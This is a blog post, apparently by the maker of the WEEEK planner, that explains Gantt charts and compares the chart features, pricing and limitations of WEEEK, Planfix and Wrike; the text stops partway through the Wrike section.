A router’s IP address is typically configured along with the host's IP address during network setup. Here are some examples of other configurations you might set during network setup:
- **IP Address (IPv4)**: Unique identifier for the device on the network.
- **Subnet Mask**: Defines the network portion of the IP address.
- **Default Gateway**: The router's IP address, which acts as the gateway to the internet.
However, discovering the MAC address can be a little tricky. To find the MAC address of a particular host in a network, the sending host does the following:
- **Checking the ARP Cache**: When a device needs to send data to another device on the same network, it first checks its [Address Resolution Protocol (ARP)](https://www.fortinet.com/resources/cyberglossary/what-is-arp#:~:text=Address%20Resolution%20Protocol%20(ARP)%20is,%2Darea%20network%20(LAN).) cache. This cache stores a list of known MAC addresses and their corresponding IP addresses. To see the ARP cache on your system, run:
```shell
arp -a
```

- **Sending an ARP Request (if not found)**: If the target device's IP address isn't found in the ARP cache, the sending device broadcasts an [ARP request](https://www.techtarget.com/searchnetworking/definition/Address-Resolution-Protocol-ARP) message on the network. This message essentially asks, "Who has the MAC address for [target device's IP address]?"
- **Receiving the MAC Address**: All devices on the network receive the ARP request, but only the intended device responds. This response includes the target device's MAC address and is sent directly back to the sender.
- **Updating the ARP Cache**: The sending device then updates its ARP cache with this new information. This allows the device to efficiently send future data packets directly to the target device without needing to repeat the ARP request.
With both the IP and MAC addresses in hand, the sending device can package the data into a frame and transmit it over the network.
Once your data has reached the receiving host, how do you ensure it is delivered to the correct application in the right format? This is the job of the transport layer.
**Transport Layer (Layer 4)**
This fourth OSI layer facilitates service-to-service delivery. If you are reading this article on your laptop or phone, you probably have multiple tabs open, all sending and receiving data continuously. How does this data stay isolated in its respective tab? The transport layer achieves this using a port addressing scheme.
You can think of ports as numbered doorways on a computer. Each application is assigned a specific port ranging from 0 to 65535 to send and receive data.
Here is a deeper look into how ports keep things organized on both the server and client side:
- **Servers**: Servers act like well-known businesses with fixed addresses. They listen for incoming requests on predefined ports. For example, web servers typically listen on port 80 (HTTP) or 443 (HTTPS). This allows clients (like your web browser) to find and connect to the desired service reliably.
- **Clients**: Unlike servers, clients choose random, temporary ports (called ephemeral ports) for their connections. This range is usually between 49152 and 65535. Choosing random ports helps avoid conflicts between apps trying to use the same port. It also adds an extra layer of security and allows a single device to make multiple connections simultaneously.
So, when a client wants to connect to a server, it sends its request to the server's IP address and its predefined port. The server then responds to the client's IP address and the temporary port used for the connection.
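You can watch the operating system hand out an ephemeral port with a few lines of Python (a sketch using only the standard library; the exact range the OS draws from varies by platform):

```python
import socket

# Ask the OS for a TCP socket and bind it to port 0, which means
# "pick any free ephemeral port for me".
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("127.0.0.1", 0))

# getsockname() reveals which port the OS actually chose.
host, port = sock.getsockname()
print(f"The OS assigned ephemeral port {port}")

sock.close()
```

Run it a few times and you will usually see a different port each run, which is exactly how each browser tab gets its own temporary doorway for its connections.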
The transport layer also uses two main protocols to handle data delivery: the [Transmission Control Protocol (TCP)](https://www.fortinet.com/resources/cyberglossary/tcp-ip) and the [User Datagram Protocol (UDP)](https://www.fortinet.com/resources/cyberglossary/user-datagram-protocol-udp).
- **TCP (Transmission Control Protocol)**: TCP is ideal for data transmissions where data integrity is crucial. It ensures that data is ordered and guaranteed to arrive, making it suitable for file transfers, emails, and web browsing.
- **UDP (User Datagram Protocol)**: Conversely, UDP sends data without guaranteed delivery or order, making it ideal for situations where speed is more important than data integrity, such as online gaming and live streaming.
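This protocol choice maps directly onto the socket API. A minimal sketch in Python, where the socket type you request selects TCP or UDP:

```python
import socket

# SOCK_STREAM asks for TCP: connection-oriented, ordered, reliable delivery.
tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# SOCK_DGRAM asks for UDP: connectionless, fire-and-forget datagrams.
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

print(tcp_sock.type, udp_sock.type)

tcp_sock.close()
udp_sock.close()
```

Everything else about reliability, ordering, and retransmission is handled (or deliberately skipped) by the kernel based on that one choice.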
**Session Layer (Layer 5)**
The fifth layer of the OSI model, the session layer, is responsible for establishing, managing, and terminating communication sessions between applications on different devices. It ensures that sessions remain open while data is being exchanged and can close them once the communication is complete.
While this article mentioned that layers 5-7 (Session, Presentation, and Application) are somewhat compressed into a single layer in modern protocols like TCP/IP, there's a historical reason for this. In the past, personal computers weren't as common. People primarily used large, centralized computers called mainframes. Since these mainframes were shared by multiple users, the Session layer played a crucial role in efficiently managing these concurrent sessions.
However, with advancements in technology and the democratization of computers, the distinctions between these layers are becoming less significant.
Here's a real-world example of how the Session layer functions in today's world: When you connect to Wi-Fi at a restaurant or bar, your phone or laptop might receive a new IP address because it's on a different network. However, thanks to the Session layer, you don't need to log in again to your apps – your connection remains active.
The session layer enables session continuity, ensuring seamless and efficient communication for applications that require ongoing interactions.
**Presentation Layer (Layer 6):**
Next, on the OSI model, you have the presentation layer. This layer acts as a translator for network communication. It ensures that the data sent from one application (like your web browser) can be understood by another application on a different system.
This is especially important when two communicating devices are using different encoding methods. The presentation layer converts data formats, handles encryption and decryption, and manages compression and decompression. By ensuring data is presented in a readable format, this layer allows applications to interpret and use the information correctly.
**Application Layer (Layer 7):**
The application layer is the topmost layer of the OSI model, and it's the only layer that directly interacts with data from the user. It provides network services directly to user applications, facilitating tasks such as sending emails, retrieving web pages, and transferring files.
This layer is responsible for identifying communication partners, ensuring resource availability, and synchronizing communication. It also translates user data into a format suitable for network transmission and vice versa. Common protocols operating at this layer include [HTTP](https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http), [FTP](https://www.fortinet.com/resources/cyberglossary/file-transfer-protocol-ftp-meaning), [SMTP](https://sendgrid.com/en-us/blog/what-is-an-smtp-server), and [DNS](https://www.cloudflare.com/learning/dns/what-is-dns/). The application layer ensures that network communication is user-friendly and accessible, enabling effective interaction with network resources.
## Putting it Together: A Practical Example
Now that this article has established the basics, how do these components work together to exchange data in the real world?
Well, to start off, you must note that sending data through the Internet involves the data traveling down the seven layers of the OSI model on the sending device, from the Application layer to the Physical layer, and then up the seven layers on the receiving device.
To simulate how data exchange happens through the OSI model, let's take the example of visiting a webpage.
## On the sending end
Visiting a webpage over the internet is largely just sending and receiving data. You send a request specifying the webpage you want to see, and in return, you receive the requested content.
Here is how the data transaction would work in an OSI model.
**Application layer (Layer 7)**
This journey starts at the Application layer when you type a website into your web browser and hit enter. In this layer, the browser uses the Domain Name System (DNS) protocol to get the website's IP address, facilitating end-to-end delivery.
DNS acts like a phonebook for the internet. It translates human-readable domain names like "google.com" into machine-readable IP addresses like "216.58.223.238" that computers use to connect to websites. This makes it much easier for people to remember and access websites. To learn how DNS works exactly, check out this article: [What is DNS?](https://aws.amazon.com/route53/what-is-dns/#:~:text=The%20Internet's%20DNS%20system%20works,These%20requests%20are%20called%20queries.)
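Python's standard library exposes the same name-to-address lookup step a browser performs (a sketch; `localhost` is used here so it resolves even without internet access, whereas a real browser would look up names like `google.com`):

```python
import socket

# Resolve a hostname to an IPv4 address, the same lookup step a
# browser performs before it can open a connection.
ip_address = socket.gethostbyname("localhost")
print(ip_address)
```

Swap in any public domain name and you get back the routable IP address that the rest of this journey will use.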
Next, the application layer prepares a [Hypertext Transfer Protocol (HTTP)](https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http) or [Hypertext Transfer Protocol Secure (HTTPS)](https://www.cloudflare.com/learning/ssl/what-is-https) request to fetch the requested webpage.
This HTTP request includes a version type, a URL, a method, request headers, and an optional HTTP body.
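Those pieces are easiest to see when you assemble a request by hand. A minimal sketch in Python (the path, host, and headers are purely illustrative):

```python
# Build a minimal HTTP/1.1 GET request line by line.
method = "GET"
path = "/index.html"          # illustrative URL path
version = "HTTP/1.1"

request = (
    f"{method} {path} {version}\r\n"   # request line: method, URL, version
    "Host: www.example.com\r\n"        # request header (required in HTTP/1.1)
    "Accept: text/html\r\n"            # another request header
    "\r\n"                             # blank line; a GET request has no body
)
print(request)
```

This text is what the lower layers will encrypt, segment, and ship across the network.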
**Presentation layer (Layer 6)**
The browser formats the HTTP request so that the server can interpret it.
Additionally, this layer handles data encryption and compression if you're accessing a secure website (HTTPS). Encryption scrambles the data to protect it from prying eyes, while compression reduces the data size for faster transmission.
**Session Layer (Layer 5):**
The browser establishes a session with Google’s server. This layer manages the session creation, maintenance, and termination, ensuring a smooth back-and-forth flow of data.
For websites prioritizing security, like those with HTTPS in the address bar, the Session layer works hand-in-hand with protocols like [SSL (Secure Sockets Layer)](https://www.digicert.com/what-is-ssl-tls-and-https) or its more modern successor, [TLS (Transport Layer Security)](https://www.digicert.com/what-is-ssl-tls-and-https). These protocols create a secure encrypted tunnel to safeguard the data traveling between your browser and the server.
**Transport Layer (Layer 4):**
In this layer, the HTTP request is broken down into smaller, manageable segments. The browser relies on TCP to ensure these segments are delivered to the correct ports on the server and that they all arrive safely and in the right order.
**Network Layer (Layer 3):**
The Network Layer breaks down the segments into smaller packets and adds header information to each packet, including the IP addresses of your computer, Host A, and the web server, Host B.
Using the IP address it got from DNS, Host A checks whether the receiving host, Host B, is on the same network. It also uses this IP address to determine the best route to send the packets across the Internet.
**Data Link Layer (Layer 2):**
The Data link layer (Layer 2) further breaks these packets into frames. These frames are encapsulated with a frame header that contains the MAC addresses of Host A's network card and Host B's network interface. This layer ensures the packets are delivered correctly within your local network.
**How Layer 3 and Layer 2 will work together**
After adding the IP header to its data packet, Host A will determine whether both the sending and receiving hosts are on the same network. If they are not, Host A needs to send the data to its default gateway, which is a router.
Host A uses an ARP request to find the router's MAC address and stores the ARP mappings (IP address mapped to a MAC address) in an ARP cache. Once Host A finds the MAC address, it adds the MAC address header to the further segmented data packets (now data frames) and sends them to the next hop or node.
Typically, hosts are not directly connected to routers but to switches, which are then connected to a router.
When the data reaches the router, the layer 2 (MAC address) header is discarded, as this layer is not needed for the next hop, which has a different source and destination and thus would need a new layer 2 header.
The Internet is a web of interconnected networks, usually involving multiple connected routers. So, when Host A sends data to the router, the router forwards it to the next router until it reaches the router in Host B's network. To learn how routers send data to each other, check out this article, [How Routers facilitate communication](https://supervisorbullying.com/how-routers-facilitate-communication/).
So the data moves from one hop to another, discarding and re-adding layer 2 headers as needed until the data packet gets to the final router in Host B’s network.
The router in Host B's network will then send an ARP request to figure out Host B's MAC address and send the data to a switch in the network. The switch then forwards the data to Host B, which finally strips the Layer 2 and Layer 3 headers.
**Physical Layer (Layer 1):**
Your network card converts the data packets into electrical signals to travel over a cable or radio waves for Wi-Fi.
## On the Receiving End
When the data reaches the receiving device (Host B), it goes back up the seven OSI model layers. Let's follow the journey of the data:
**Physical Layer (Layer 1):** The data arrives as electrical signals (for wired connections) or radio waves (for wireless connections) and is received by Host B's network interface card (NIC). The NIC converts these signals back into binary data.
**Data Link Layer (Layer 2):** The NIC processes the incoming frames. It checks the frame header for the MAC address to confirm it's the intended recipient. The frame header is then stripped off, and the remaining data is passed to the Network layer.
**Network Layer (Layer 3):** At this layer, the packets are examined to ensure they are addressed to Host B’s IP address. If the packet is for Host B, the network layer strips off the IP header and reassembles the fragments into the original segments.
The data is then passed up to the Transport layer.
**Transport Layer (Layer 4):** The Transport layer (typically using TCP) reassembles the segments into the original message. It checks for errors and ensures all data segments are correctly ordered.
Once reassembled, the data is passed to the Session layer.
**Session Layer (Layer 5):** This layer manages the session between the browser and the web server. It ensures the session remains open as long as data exchange is needed.
If the session uses SSL/TLS, it ensures that the data remains encrypted until it is passed to the Presentation layer.
**Presentation Layer (Layer 6):** If the data is encrypted (e.g., HTTPS), the Presentation layer decrypts it. This layer also handles any data formatting or translation needed to make the data understandable to the Application layer.
The formatted data is then passed to the Application layer.
**Application Layer (Layer 7):** The Application layer receives the HTTP response. The web browser processes the HTTP response, which contains the HTML, CSS, JavaScript, and other resources needed to render the webpage.
The browser then renders the webpage, displaying it to the user.
## Wrapping it up
The internet is a deeply interesting web of devices. As more people around the world have clever ideas and develop new smart devices, the internet becomes even more complex and diverse.
Despite their differences, the internet only works well because these diverse devices can communicate with each other. This is thanks to a standardized set of rules and regulations called protocols. No matter where your devices are located or what kind of devices they are, they can talk to each other across the vast ocean of the internet, understand each other, and exchange information. That, my friends, is the beauty of the OSI model.
As discussed extensively in this article, the OSI model is a seven-layered framework that acts like a translator for all these devices. Each layer has its own specific protocol, like a specialized language, that allows it to communicate with the layers above and below it. These protocols ensure that data is packaged correctly, addressed for its destination, and delivered efficiently.
| amaraiheanacho |
1,879,650 | NumPy for Beginners: Why You Should Rely on Numpy Arrays More | Table of content What is NumPy? Key Aspects of NumPy in Python Why You Should Use... | 0 | 2024-06-06T21:16:34 | https://dev.to/varshav/numpy-for-beginners-a-basic-guide-to-get-you-started-2eg8 | webdev, python, numpy, beginners | <!-- TOC start -->
### Table of content
- [What is NumPy?](#what-is-numpy)
* [Key Aspects of NumPy in Python](#key-aspects-of-numpy-in-python)
* [Why You Should Use NumPy](#why-you-should-use-numpy)
- [Installation](#installation)
- [Creating Arrays](#creating-arrays)
- [Array attributes](#array-attributes)
- [Basic Operations](#basic-operations)
- [Reshaping and Slicing](#reshaping-and-slicing)
- [Boolean Indexing and Filtering](#boolean-indexing-and-filtering)
- [Matrix Operations](#matrix-operations)
- [Random Numbers](#random-numbers)
- [Conclusion](#conclusion)
<!-- TOC end -->
<a name="what-is-numpy"></a>
### What is NumPy?

NumPy, short for Numerical Python, is a fundamental library for numerical and scientific computing in Python. It provides support for large, multi-dimensional arrays and matrices, along with a collection of high-level mathematical functions to operate on these arrays. NumPy serves as the foundation for many data science and machine learning libraries, making it an essential tool for data analysis and scientific research in Python.
<a name="key-aspects-of-numpy-in-python"></a>
#### Key Aspects of NumPy in Python
`Efficient Data Structures`: NumPy introduces efficient array structures, which are faster and more memory-efficient than Python lists. This is crucial for handling large data sets.
`Multi-Dimensional Arrays`: NumPy allows you to work with multi-dimensional arrays, enabling the representation of matrices and tensors. This is particularly useful in scientific computing.
`Element-Wise Operations`: NumPy simplifies element-wise mathematical operations on arrays, making it easy to perform calculations on entire data sets in one go.
`Random Number Generation`: It provides a wide range of functions for generating random numbers and random data, which is useful for simulations and statistical analysis.
`Integration with Other Libraries`: NumPy seamlessly integrates with other data science libraries like SciPy, Pandas, and Matplotlib, enhancing its utility in various domains.
`Performance Optimization`: NumPy functions are implemented in low-level languages like C and Fortran, which significantly boosts their performance. It's a go-to choice when speed is essential.
<a name="why-you-should-use-numpy"></a>
#### Why You Should Use NumPy
`Speed and Efficiency`: NumPy is designed to handle large arrays and matrices of numeric data. Its operations are faster than standard Python lists and loops because it uses optimized C and Fortran code under the hood.
`Consistency and Compatibility`: Many other scientific libraries (such as SciPy, Pandas, and scikit-learn) are built on top of NumPy. This means that learning NumPy will make it easier to understand and use these other tools.
`Ease of Use`: NumPy's syntax is clean and easy to understand, which makes it simple to perform complex numerical operations. Its array-oriented approach makes code more readable and concise.
`Community and Support`: NumPy has a large, active community of users and contributors. This means that you can find plenty of resources, tutorials, and documentation to help you learn and troubleshoot.
`Flexibility`: NumPy supports a wide range of numerical operations, from simple arithmetic to more complex linear algebra and statistical computations. This makes it a versatile tool for many different types of data analysis.
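That speed claim is easy to check for yourself. Here is a small benchmark sketch (timings vary by machine, so treat the printed numbers as illustrative rather than definitive):

```python
import time
import numpy as np

n = 1_000_000
py_list = list(range(n))
np_array = np.arange(n)

# Sum of squares with a plain Python generator expression
start = time.perf_counter()
py_result = sum(x * x for x in py_list)
py_time = time.perf_counter() - start

# The same computation, vectorized in NumPy
start = time.perf_counter()
np_result = int((np_array * np_array).sum())
np_time = time.perf_counter() - start

print(f"Python loop: {py_time:.4f}s, NumPy: {np_time:.4f}s")
```

On most machines the NumPy version finishes many times faster, because the loop runs in compiled code instead of the Python interpreter.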
<a name="installation"></a>
### Installation
`Using pip`: Open your terminal or command prompt and run the following command:
```python
pip install numpy
```
`Using conda (if you're using the Anaconda distribution)`: Open your terminal or Anaconda Prompt and run:
```python
conda install numpy
```
`Verifying the installation`: To verify that NumPy is installed correctly, you can try importing it in a Python script or in an interactive Python session:
```python
import numpy as np
print(np.__version__)
```
<a name="creating-arrays"></a>
### Creating Arrays
```python
import numpy as np
# here, the NumPy library is imported and assigned an alias np to make it easier to reference in the code.
# Creating a 1D array
array_1d = np.array([1, 2, 3, 4, 5])
print("1D Array:", array_1d)
# Output: 1D Array: [1 2 3 4 5]
# Creating a 2D array
array_2d = np.array([[1, 2, 3], [4, 5, 6]])
print("2D Array:\n", array_2d)
# Output: 2D Array:
# [[1 2 3]
# [4 5 6]]
# Creating arrays with zeros, ones, and a constant value
zeros = np.zeros((3, 3))
print("Zeros:\n", zeros)
# Output: Zeros:
# [[0. 0. 0.]
# [0. 0. 0.]
# [0. 0. 0.]]
ones = np.ones((2, 4))
print("Ones:\n", ones)
# Output: Ones:
# [[1. 1. 1. 1.]
# [1. 1. 1. 1.]]
constant = np.full((2, 2), 7)
print("Constant:\n", constant)
# Output: Constant:
# [[7 7]
# [7 7]]
# Creating an array with a range of values
range_array = np.arange(10)
print("Range Array:", range_array)
# Output: Range Array: [0 1 2 3 4 5 6 7 8 9]
range_step_array = np.arange(0, 10, 2)
print("Range with Step Array:", range_step_array)
# Output: Range with Step Array: [0 2 4 6 8]
# Creating an array with equally spaced values
linspace_array = np.linspace(0, 1, 5) # [0. , 0.25, 0.5 , 0.75, 1. ]
print("Linspace Array:", linspace_array)
# Output: Linspace Array: [0. 0.25 0.5 0.75 1. ]
```
<a name="array-attributes"></a>
### Array attributes
NumPy arrays have several useful attributes:
```python
arr_2d = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
print(arr_2d.ndim) # ndim : Represents the number of dimensions or "rank" of the array.
# output : 2
print(arr_2d.shape) # shape : Returns a tuple indicating the number of rows and columns in the array.
# Output : (3, 3)
print(arr_2d.size) # size: Provides the total number of elements in the array.
# Output : 9
```
<a name="basic-operations"></a>
### Basic Operations
```python
# Arithmetic operations
a = np.array([1, 2, 3, 4])
b = np.array([5, 6, 7, 8])
# Element-wise addition, subtraction, multiplication, and division
sum_array = a + b
print(sum_array)
# Output: [ 6 8 10 12]
diff_array = a - b
print(diff_array)
# Output: [-4 -4 -4 -4]
prod_array = a * b
print(prod_array)
# Output: [ 5 12 21 32]
quot_array = a / b
print(quot_array)
# Output: [0.2 0.33333333 0.42857143 0.5 ]
# Aggregation functions
mean_value = np.mean(a)
print(mean_value) # Output: 2.5
sum_value = np.sum(a)
print(sum_value) # Output: 10
min_value = np.min(a)
print(min_value) # Output: 1
max_value = np.max(a)
print(max_value) # Output: 4
```
<a name="reshaping-and-slicing"></a>
### Reshaping and Slicing
```python
# Reshaping arrays
array = np.arange(1, 13) # array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
reshaped_array = array.reshape((3, 4)) # 3x4 array
print(reshaped_array)
# Output: [[ 1 2 3 4]
# [ 5 6 7 8]
# [ 9 10 11 12]]
# Slicing arrays
array = np.array([1, 2, 3, 4, 5, 6])
slice_array = array[1:4]
print(slice_array)
# Output: [2 3 4]
slice_2d_array = reshaped_array[1, :] # Second row of the reshaped array
print(slice_2d_array)
# Output: [5 6 7 8]
```
<a name="boolean-indexing-and-filtering"></a>
### Boolean Indexing and Filtering
```python
# Boolean indexing
array = np.array([1, 2, 3, 4, 5, 6])
bool_index = array > 3
print(bool_index)
# Output: [False False False True True True]
filtered_array = array[bool_index]
print(filtered_array)
# Output: [4 5 6]
# Direct filtering
filtered_array_direct = array[array > 3]
print(filtered_array_direct)
# Output: [4 5 6]
```
<a name="matrix-operations"></a>
### Matrix Operations
```python
# Matrix multiplication
matrix_a = np.array([[1, 2], [3, 4]])
matrix_b = np.array([[5, 6], [7, 8]])
matrix_product = np.dot(matrix_a, matrix_b)
print(matrix_product)
# Output: [[19 22]
# [43 50]]
# Transpose of a matrix
transpose_matrix = matrix_a.T
print(transpose_matrix)
# Output: [[1 3]
# [2 4]]
# Inverse of a matrix
inverse_matrix = np.linalg.inv(matrix_a)
print(inverse_matrix)
# Output: [[-2. 1. ]
# [ 1.5 -0.5]]
```
<a name="random-numbers"></a>
### Random Numbers
```python
# Generating random numbers
random_array = np.random.random((2, 3)) # 2x3 array with random values between 0 and 1
random_int_array = np.random.randint(0, 10, (2, 3)) # 2x3 array with random integers between 0 and 9
```
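When you need reproducible results, for example in tests or tutorials, you can seed the generator. A sketch using NumPy's newer `Generator` API:

```python
import numpy as np

# Seeding makes the "random" sequence repeatable across runs.
rng = np.random.default_rng(seed=42)
sample_a = rng.random((2, 3))

# A fresh generator with the same seed reproduces the same values.
rng_again = np.random.default_rng(seed=42)
sample_b = rng_again.random((2, 3))

print(np.array_equal(sample_a, sample_b))  # Output: True
```

This is especially handy when sharing notebooks, since readers can reproduce your exact "random" data.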
<a name="conclusion"></a>
### Conclusion
NumPy is an essential library for anyone working with numerical data in Python. Its powerful features, such as efficient data structures, multi-dimensional arrays, and a wide range of mathematical functions, make it an indispensable tool for data analysis and scientific computing. By integrating seamlessly with other data science libraries and providing significant performance boosts, NumPy stands out as a critical component of the Python ecosystem. Whether you're new to Python or an experienced data scientist, learning NumPy will improve your ability to handle large datasets and perform complex calculations. Its active community and extensive documentation make it easy to learn and use.
This guide covers the basics of NumPy, and there's much more to explore. Visit [numpy.org](https://numpy.org/) for more information and examples.
If you have any questions, suggestions, or corrections, please feel free to leave a comment. Your feedback helps me improve and create more accurate content.
**Happy coding!!!**
_The cover picture was downloaded from [storyset](https://storyset.com/)_ | varshav |
1,877,542 | Managing your GoDaddy domain with Route53 | This post explains how to use AWS Route53 to manage your external domain, such as GoDaddy. Simply... | 0 | 2024-06-06T21:13:42 | https://dev.to/diegop0s/managing-your-godaddy-domain-with-route53-5f2p | dns, route53, godaddy, aws | This post explains how to use AWS Route53 to manage your external domain, such as GoDaddy. Simply follow these steps:
## Select your domain in GoDaddy

Verify the domain you own. The domain name is important, for example: **my-daddy-o.org**
## Create your Hosted Zone in Route53
Log in to the AWS Console and navigate to the Route53 service console. Then, go to the "Hosted Zone" section and click on "Create hosted zone".

Type your Domain name here (my-daddy-o.org) and select "Public" type.

After setting up your Hosted Zone, review the records and double-check the default NS and SOA records, especially the "NS" type record.


## Update your Nameservers on GoDaddy
Go to your GoDaddy domain, navigate to the "DNS" section, update the "Nameservers," and then click "Change".

In the new window, enter the values from your "NS" record in Route53. Be careful to not include the last dot. For example: `ns-777.awsdns-11.com.` → `ns-777.awsdns-11.com`

## Verify your domain
You can verify the complete application of your Name Server change by checking its propagation. This may take some time (minutes to hours). Use [whatsmydns](https://www.whatsmydns.net/#NS) to check for correct propagation.

## Validate a record
As an additional step, you need to create a new record on Route53 to validate its functionality.
In my case, I created an S3 Bucket to test a simple website. After configuring the bucket as a static website, I created a new record pointing to the website endpoint.
For this, I created a new record "www.my-daddy-o.org". Please verify that the URL resolves to your bucket.


| diegop0s |
1,879,649 | Rails and Postgres | I'm slowly grasping the connection between Rails and Postgres. I'm starting to feel like this is the... | 0 | 2024-06-06T21:10:09 | https://dev.to/brvarner/rails-and-postgres-5234 | rails, postgres | I'm slowly grasping the connection between Rails and Postgres. I'm starting to feel like this is the key to the Model-View-Controller system, but I'm still working on fully wrapping my head around this bad boy.
Luckily, I took copious notes during most Postgres/Rails lesson, and you can [read them here](https://github.com/brvarner/dpi-notes/blob/main/june5.md).
## Getting Started
You must first download [PostgreSQL](https://www.postgresql.org/), and follow the prompts to learn its console line commands.
You must start by initializing a database and then creating a table.
When you create a table, you must include the fields and data types that all of your entries will have. Here's an example from the exercise in the course, where we created a contact book:
```
CREATE TABLE contacts (
id SERIAL PRIMARY KEY,
first_name TEXT,
last_name TEXT,
date_of_birth DATE,
street_address_1 TEXT,
street_address_2 TEXT,
city TEXT,
state TEXT,
zip TEXT,
phone TEXT,
notes TEXT,
created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP
);
```
The id field will always be a SERIAL PRIMARY KEY to indicate it should auto-increment and that this will be the primary key of your table.
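With the table in place, a couple of statements exercise it (the row values here are made up for illustration):

```sql
-- Add a contact; id and created_at fill themselves in automatically
INSERT INTO contacts (first_name, last_name, city, phone)
VALUES ('Ada', 'Lovelace', 'Chicago', '555-0100');

-- Look contacts up by a field
SELECT first_name, last_name, phone
FROM contacts
WHERE city = 'Chicago';
```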
After creating your table, you can open it for editing/access with the `psql` command, or by using `rails db`.
To link your Rails project with your database, you have to edit your `config/database.yml` file. Change `rails_template_development` on line 27 to your database's name and it'll find it on your computer.
Also, you can access Rails' built-in database GUI by launching bin/server and navigating to `rails/db` in your project. From there, you can perform CRUD operations on data or observe.
### Models
You must interface with your database via a Model, which Rails provides as an easy way to structure your database actions. Models are Ruby classes that "talk to the database, store and validate data, perform the business logic, and otherwise do the heavy lifting".
These models inherit methods from Rails's built-in ActiveRecord class, which lets them do many different moves. Each model represents a single row of data, so they're named singularly after the name of the table (i.e. a model named Contact for a table named contacts). This naming convention helps Rails automatically locate the table that the model represents.
We can operate on the data several ways once we complete setup, but I'm calling it on Rails/Postgres until we do it next week as a class.
| brvarner |
1,879,648 | Identifying a typosquatting attack on "requests," the 4th-most-popular Python package | An attacker published a Python package to the PyPI (Python Package Index) registry named requestn, a... | 0 | 2024-06-06T21:01:46 | https://dev.to/stacey_potter_3de75e600a1/identifying-a-typosquatting-attack-on-requests-the-4th-most-popular-python-package-3cm2 | opensource, security, python, typosquatting | An attacker published a Python package to the PyPI (Python Package Index) registry named requestn, a name that's very similar to the very popular PyPI requests library. This user even tagged the same latest version of 8.0, so this was clearly a typosquatting attack.
[Trusty](https://www.trustypkg.dev/) is a free-to-use software supply chain security monitoring platform that gives you insight into the safety of your open source dependencies. Trusty looks for certain patterns such as the proof of origin / source provenance mapping of a codebase to a package; the activity of the project and its authors; and the advanced textual / binary analysis of a package contents to discover malware, CVEs, and malicious code.
It came to our attention earlier today that a 3-day-old account, "Dmitry2001," published a Python package to the PyPI (Python Package Index) registry named `requestn`, a name that's very similar to the very popular PyPI `requests` library. The [requests library](https://pypi.org/project/requests/) has more than 30 million downloads a week. It is a hugely popular library in Python that simplifies making HTTP requests to interact with web services.
Trusty's threat analysis system, developed by Stacklok, was able to interpret the `requestn` package as suspicious, due to its close proximity to the popular `requests` library...
Read the full article by Luis Juncal & Luke Hinds [here](https://stacklok.com/blog/identifying-a-typosquatting-attack-on-requests-the-4th-most-popular-python-package) | stacey_potter_3de75e600a1 |
1,876,327 | Top 10 Gantt Chart Tools for 2024 | What is a Gantt Chart and How to Use It A Gantt chart is a project management tool designed to help... | 0 | 2024-06-06T21:00:00 | https://dev.to/weeek/top-10-gantt-chart-tools-for-2024-24a9 | product, productivity, news, softwaredevelopment | What is a Gantt Chart and How to Use It
A Gantt chart is a project management tool designed to help organize and visualize personal or team projects.
**The chart aids in visualization and allows you to:**

- Establish the order of task completion
- Estimate time and workload for each team member
- Highlight priorities and relationships between different stages
- Identify critical points that directly impact the project
For personal use, it is an excellent self-management tool, and for team work, it acts as a lifeline. It helps manage tasks efficiently, clearly delineates projects, and accounts for each team member's working hours.
For guidance on how to create a Gantt chart and what to consider during the process, check out this recommended article. It's a great starting point if you're new to the topic.
Now, addressing one of the most popular queries, "Where can I create a Gantt chart?" let's dive into a selection of services. We'll briefly overview their main features and visual execution.
## **WEEEK**
Traditionally, we'll start with our planner. It's a comprehensive remote office where you can collaborate with your team, plan tasks, monitor their progress, and create Gantt charts. If you need a universal program, this is the place to go.
**Available Plans for Gantt Chart Creation**
Gantt charts are available on all plans, including the free one. However, it’s more convenient to use the chart starting from the Lite plan, where you can create extended tasks (from $3.99 per month per user).
**Interface Features**
- Displays task and subtask names on the sidebar and the chart itself
- Completed tasks are crossed out on the chart and marked with checkmarks on the sidebar
- The chart shows the completion time, task dependencies, constraints, and dates
- Additionally, the sidebar displays task priority (by color) and the executor's avatar

**Capabilities**

- Quickly create and format tasks both on the chart and the sidebar
- Make tasks private
- Add additional materials, comment on tasks, and view change history
- Set dependencies between tasks, block one task until another is completed
- Move the timeline directly on the chart
- Scale the display of tasks by days, weeks, and months
- Change a subtask's status to a main task's status
- Sort by priority, date, type, and estimated time

**Limitations / Not Yet Available**

- No separate visualization for milestones (key project stages)
- Task progress is not displayed on the chart
- Task coloring is not yet available
- Tasks cannot be manually moved on the sidebar (new tasks are created at the bottom)
- Days of the week are not indicated
## **Planfix**
Another versatile service for large teams and projects with the capability to build Gantt charts. Planfix offers a wide range of features.
**Available Plans for Gantt Chart Creation**
The free plan has limitations on the number of employees (up to five) and projects (up to 10). If you fit within these limits, you can create Gantt charts at no cost. The minimum paid plan starts at €3 per employee.
**Interface Features**
- Displays task and subtask names on the chart and sidebar
- On the chart: tasks in progress, completed tasks, overdue tasks (in different colors); dependencies between tasks, executor in First Name Last Name format, dates, and days of the week
- On the sidebar: start date, end date, and task duration in days; priority (by color)

**Capabilities**

- Edit start and end dates on the sidebar and chart
- Filter tasks and manually move them on the sidebar
- Set dependencies between tasks and assign statuses, but only in advanced editing
- Scale task display in hours, days, weeks, and months
- Set and manage milestones
- Specify exact times for task execution (from and to) or the number of hours
- Require result verification before marking a task as complete
- Create summary tasks, where the duration of a specific task is automatically calculated based on the durations of its subtasks (a big plus for simplifying life)

**Limitations / Not Yet Available**

- Cannot quickly edit task statuses
- There's a separate "urgent" task status, but it doesn't display on the panel
- The button to create a subtask is hard to find (hint: it's within the advanced task editing)
- No clear distinction between tasks and subtasks on the sidebar
- No display of task progress stages
## **Wrike**
A popular international planner for flexible project management, including a visually appealing Gantt chart. It is a simple and intuitive system.
**Available Plans for Gantt Chart Creation**
Gantt charts are available starting from the Team plan ($9.80 per user per month).

**Interface Features**

- Task and subtask names on the panel and chart
- Task status: on the chart — by colors, on the panel — by label
- On the chart: task dependencies, executor by name, dates and days of the week, milestones
- On the panel: priority (low, medium, high); start date and due date

